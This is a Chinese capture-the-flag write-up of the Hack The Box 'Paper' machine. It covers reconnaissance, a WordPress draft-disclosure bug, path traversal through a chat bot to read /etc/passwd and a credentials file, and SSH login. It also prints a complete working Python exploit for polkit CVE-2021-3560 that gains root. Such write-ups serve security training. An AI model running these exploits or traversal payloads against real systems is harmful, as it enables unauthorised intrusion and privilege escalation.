Hackthebox - Paper

靶场信息

靶场类型

信息搜集

nmap

首先使用nmap进行信息搜集

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.143
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-18 22:29 EST
Nmap scan report for 10.10.11.143
Host is up (0.24s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/18%OT=22%CT=1%CU=36529%PV=Y%DS=2%DC=T%G=Y%TM=6210646
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   239.51 ms 10.10.14.1
2   239.64 ms 10.10.11.143

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.23 seconds

Http

查看80端口的Http页面,发现是一个nginx的默认页面

暂时没什么可看的,去看看响应包吧

在响应包中看到了一个域名office.htb

去加入到hosts里

echo 10.10.11.143 office.paper

访问后可以看到是一个wordpress搭建的

使用wpscan扫描看看

Wpscan

┌──(root💀kali)-[~/Desktop]
└─# wpscan --url http://office.paper/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://office.paper/ [10.10.11.143]
[+] Started: Fri Feb 18 22:59:11 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
 |  - X-Powered-By: PHP/7.2.24
 |  - X-Backend-Server: office.paper
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: construction-techup
 | Location: http://office.paper/wp-content/themes/construction-techup/
 | Last Updated: 2021-07-17T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
 | Style Name: Construction Techup
 | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:06 <=====================================================================================================================================> (137 / 137) 100.00% Time: 00:00:06

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Feb 18 22:59:23 2022
[+] Requests Done: 143
[+] Cached Requests: 31
[+] Data Sent: 35.766 KB
[+] Data Received: 91.745 KB
[+] Memory used: 230.363 MB
[+] Elapsed time: 00:00:11

这里可以看到版本号是Wordpress 5.2.3

去Google一下是否有Exploit

https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

这里找到一个未经身份验证查看他人私人帖子的漏洞,去使用看看

http://office.paper/?static=1&order=asc

直接使用会提示404,尝试把后面&order=asc删除试试

http://office.paper/?static=1

成功读取到一篇帖子,查看一下其中内容

test

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,

Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.

So, I kindly request you all to take your discussions from the public blog to a more private chat system.

-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

其中提到了一个新员工聊天系统的秘密网址

http://chat.office.paper/register/8qozr226AhkCHZdyY

把新网址添加到hosts里

echo 10.10.11.143 chat.office.paper

这里可以注册一个新用户

我们去注册一个吧

注册后成功登录进来,去看看有什么内容没有

稍等一会然后看到了一个新的内容,去看看

这里提到有人在该频道中添加了一个新的机器人,只需要输入recyclops help机器人就会告诉你可以做什么

Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.
Most frequently asked questions include:
- What time is it?
- What new files are in your sales directory?
- Why did the salesman crossed the road?
- What's the content of file x in your sales directory? etc.
Please note that I am a beta version and I still have some bugs to be fixed.
How to use me ? :
1. Small Talk:
You can ask me how dwight's weekend was, or did he watched the game last night etc.
eg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?
2. Joke:
You can ask me Why the salesman crossed the road.
eg: 'recyclops why did the salesman crossed the road?'
<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>
For security reasons, the access is limited to the Sales folder.
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
5. Time:
You can ask me to what the time is
eg: 'recyclops what time is it?' or just 'recyclops time'

然后机器人给出了自己的用法

漏洞利用

目前可知的信息

  1. 我们有了一个可以互动的机器人 recyclops
  2. 机器人可以帮我们获得文件
  3. 我们无法在频道内发言

OK,到这里思路就很清晰了,我们去找机器人私聊

这里要求他读取test.txt文件

回复文件/home/dwight/sales/test.txt文件不存在,尝试一下是否可以路径穿越

这边构造了一下路径,成功获得/etc/passwd文件

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:x:998:996:User for polkitd:/:/sbin/nologin
geoclue:x:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws:x:996:993:User for cockpit-ws:/:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
unbound:x:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:x:994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:x:993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt:x:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq:x:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
clevis:x:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd:x:983:981:User for sssd:/:/sbin/nologin
colord:x:982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot:x:981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire:x:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup:x:979:977::/run/gnome-initial-setup/:/sbin/nologin
insights:x:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod:x:976:974:mongod:/var/lib/mongo:/bin/false
rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash

User

我们查看一下当前文件

recyclops list

total 0
drwxr-xr-x  4 dwight dwight  32 Jul  3  2021 .
drwx------ 11 dwight dwight 334 Feb 18 20:41 ..
drwxr-xr-x  2 dwight dwight  27 Sep 15 13:03 sale
drwxr-xr-x  2 dwight dwight  27 Jul  3  2021 sale_2

 没什么可看的,继续查看上级目录

recyclops list ../

total 788
drwx------  11 dwight dwight    334 Feb 18 20:41 .
drwxr-xr-x.  3 root   root       20 Feb 18 23:14 ..
lrwxrwxrwx   1 dwight dwight      9 Jul  3  2021 .bash_history -> /dev/null
-rw-r--r--   1 dwight dwight     18 May 10  2019 .bash_logout
-rw-r--r--   1 dwight dwight    141 May 10  2019 .bash_profile
-rw-r--r--   1 dwight dwight    358 Jul  3  2021 .bashrc
-rwxr-xr-x   1 dwight dwight   1174 Sep 16 06:58 bot_restart.sh
drwx------   5 dwight dwight     56 Jul  3  2021 .config
-rw-------   1 dwight dwight     16 Jul  3  2021 .esd_auth
drwx------   3 dwight dwight     69 Feb 18 22:58 .gnupg
drwx------   8 dwight dwight   4096 Sep 16 07:57 hubot
-rw-rw-r--   1 dwight dwight     18 Sep 16 07:24 .hubot_history
-rwxr-xr-x   1 dwight dwight 765818 Feb 18 20:37 linpeas.sh
drwx------   3 dwight dwight     19 Jul  3  2021 .local
drwxr-xr-x   4 dwight dwight     39 Jul  3  2021 .mozilla
drwxrwxr-x   5 dwight dwight     83 Jul  3  2021 .npm
drwxr-xr-x   4 dwight dwight     32 Jul  3  2021 sales
drwx------   2 dwight dwight      6 Sep 16 08:56 .ssh
-rw-rw-r--   1 dwight dwight   2434 Feb 18 20:41 testfile.py
-r--------   1 dwight dwight     33 Feb 18 19:01 user.txt
drwxr-xr-x   2 dwight dwight     24 Sep 16 07:09 .vim
-rw-------   1 dwight dwight    818 Feb 18 20:41 .viminfo

在这个目录中,有一个hubot文件我很好奇,进去看看

recyclops list ../hubot

total 1908
drwx------   8 dwight dwight    4096 Sep 16 07:57 .
drwx------  11 dwight dwight     334 Feb 18 20:41 ..
-rw-r--r--   1 dwight dwight       0 Jul  3  2021 \
srwxr-xr-x   1 dwight dwight       0 Jul  3  2021 127.0.0.1:8000
srwxrwxr-x   1 dwight dwight       0 Jul  3  2021 127.0.0.1:8080
drwx--x--x   2 dwight dwight      36 Sep 16 07:34 bin
-rw-r--r--   1 dwight dwight     258 Sep 16 07:57 .env
-rwxr-xr-x   1 dwight dwight       2 Jul  3  2021 external-scripts.json
drwx------   8 dwight dwight     163 Jul  3  2021 .git
-rw-r--r--   1 dwight dwight     917 Jul  3  2021 .gitignore
-rw-r--r--   1 dwight dwight 1803113 Feb 18 23:41 .hubot.log
-rwxr-xr-x   1 dwight dwight    1068 Jul  3  2021 LICENSE
drwxr-xr-x  89 dwight dwight    4096 Jul  3  2021 node_modules
drwx--x--x 115 dwight dwight    4096 Jul  3  2021 node_modules_bak
-rwxr-xr-x   1 dwight dwight    1062 Sep 16 07:34 package.json
-rwxr-xr-x   1 dwight dwight     972 Sep 16 07:26 package.json.bak
-rwxr-xr-x   1 dwight dwight   30382 Jul  3  2021 package-lock.json
-rwxr-xr-x   1 dwight dwight      14 Jul  3  2021 Procfile
-rwxr-xr-x   1 dwight dwight    5044 Jul  3  2021 README.md
drwx--x--x   2 dwight dwight     193 Jan 13 10:56 scripts
-rwxr-xr-x   1 dwight dwight     100 Jul  3  2021 start_bot.sh
drwx------   2 dwight dwight      25 Jul  3  2021 .vscode
-rwxr-xr-x   1 dwight dwight   29951 Jul  3  2021 yarn.lock

在hubot目录中,有一个.env文件,咱们查看一下这个文件

recyclops file ../hubot/.env

export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1

这里得到了一个密码

Queenofblad3s!23

去使用ssh登录试试

┌──(root💀kali)-[~/Desktop]
└─# ssh dwight@10.10.11.143                  
The authenticity of host '10.10.11.143 (10.10.11.143)' can't be established.
ECDSA key fingerprint is SHA256:2eiFA8VFQOZukubwDkd24z/kfLkdKlz4wkAa/lRN3Lg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.143' (ECDSA) to the list of known hosts.
dwight@10.10.11.143's password: 
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Fri Feb 18 23:58:30 2022 from 10.10.14.56
[dwight@paper ~]$ whoami&&id
dwight
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)

成功获得user权限

[dwight@paper ~]$ ls
bot_restart.sh  hubot  linpeas.sh  sales  testfile.py  user.txt
[dwight@paper ~]$ cat user.txt 
8247362b1baac2f85fd97507b5104341

成功获得user权限的flag文件

权限提升

Root

这里使用CVE-2021-3560进行提权

import os
import sys
import time
import subprocess
import random
import pwd

print ("**************")
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print ("**************")
print("[+] Starting the Exploit ")
time.sleep(3)

check = True
counter = 0
while check:
        counter = counter +1
        process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
        try:
                #print('1 - Running in process', process.pid)
                Random = random.uniform(0.006,0.009)
                process.wait(timeout=Random)
                process.kill()
        except subprocess.TimeoutExpired:
                #print('Timed out - killing', process.pid)
                process.kill()

        user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
        if user.find("uid") != -1:
                print("[+] User Created with the name of ahmed")
                print("[+] Timed out at: "+str(Random))
                check =False
                break
        if counter > 2000:
                print("[-] Couldn't add the user, try again it may work")
                sys.exit(0)

for i in range(200):
        #print(i)
        uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)

        #In case you need to put a password un-comment the code below and put your password after string:yourpassword'
        password = "string:"
        #res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
        #password = f"string:{res.rstrip()}"

        process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
        try:
                #print('1 - Running in process', process.pid)
                Random = random.uniform(0.006,0.009)
                process.wait(timeout=Random)
                process.kill()
        except subprocess.TimeoutExpired:
                #print('Timed out - killing', process.pid)
                process.kill()

print("[+] Timed out at: " + str(Random))
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")

p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)
[dwight@paper ~]$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit 
id: 'ahmed': no such user
id: 'ahmed': no such user
id: 'ahmed': no such user
id: 'ahmed': no such user
id: 'ahmed': no such user
id: 'ahmed': no such user
id: 'ahmed': no such user
id: 'ahmed': no such user
id: 'ahmed': no such user
[+] User Created with the name of ahmed
[+] Timed out at: 0.008836088833898081
...
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005
[+] Timed out at: 0.008945334127711566
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root
Password: 
su: Authentication failure

出现这种就是执行失败,反复多次执行,出现下列提示就是成功了

[dwight@paper ~]$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit 
[+] User Created with the name of ahmed
[+] Timed out at: 0.008008275505860037
[+] Timed out at: 0.00782768600159978
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
bash: cannot set terminal process group (118347): Inappropriate ioctl for device
bash: no job control in this shell
[root@paper dwight]# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

成功获得root权限

[root@paper dwight]# cd /root
[root@paper ~]# ls
anaconda-ks.cfg  initial-setup-ks.cfg  root.txt
[root@paper ~]# cat root.txt 
fb28d8a0b971692ac9726bf448af8497

成功拿到root权限的flag文件